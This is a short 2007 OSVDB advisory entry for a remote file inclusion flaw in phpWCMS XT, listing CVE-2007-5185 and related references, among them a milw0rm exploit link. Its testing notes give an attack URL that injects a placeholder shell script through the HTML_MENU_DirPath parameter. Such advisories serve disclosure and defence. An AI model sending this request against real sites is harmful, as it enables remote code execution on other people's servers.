phpWCMS XT config_HTML_MENU.php HTML_MENU_DirPath Variable Remote File Inclusion

2007-10-01T00:00:00
ID OSVDB:38591
Type osvdb
Reporter OSVDB
Modified 2007-10-01T00:00:00

Description

Manual Testing Notes

http://[target]/path/phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=[[Sh3LLScript]]

References:

Related OSVDB ID: 38592 ISS X-Force ID: 36905 Generic Exploit URL: http://www.milw0rm.com/exploits/4477 FrSIRT Advisory: ADV-2007-3332 CVE-2007-5185 Bugtraq ID: 25879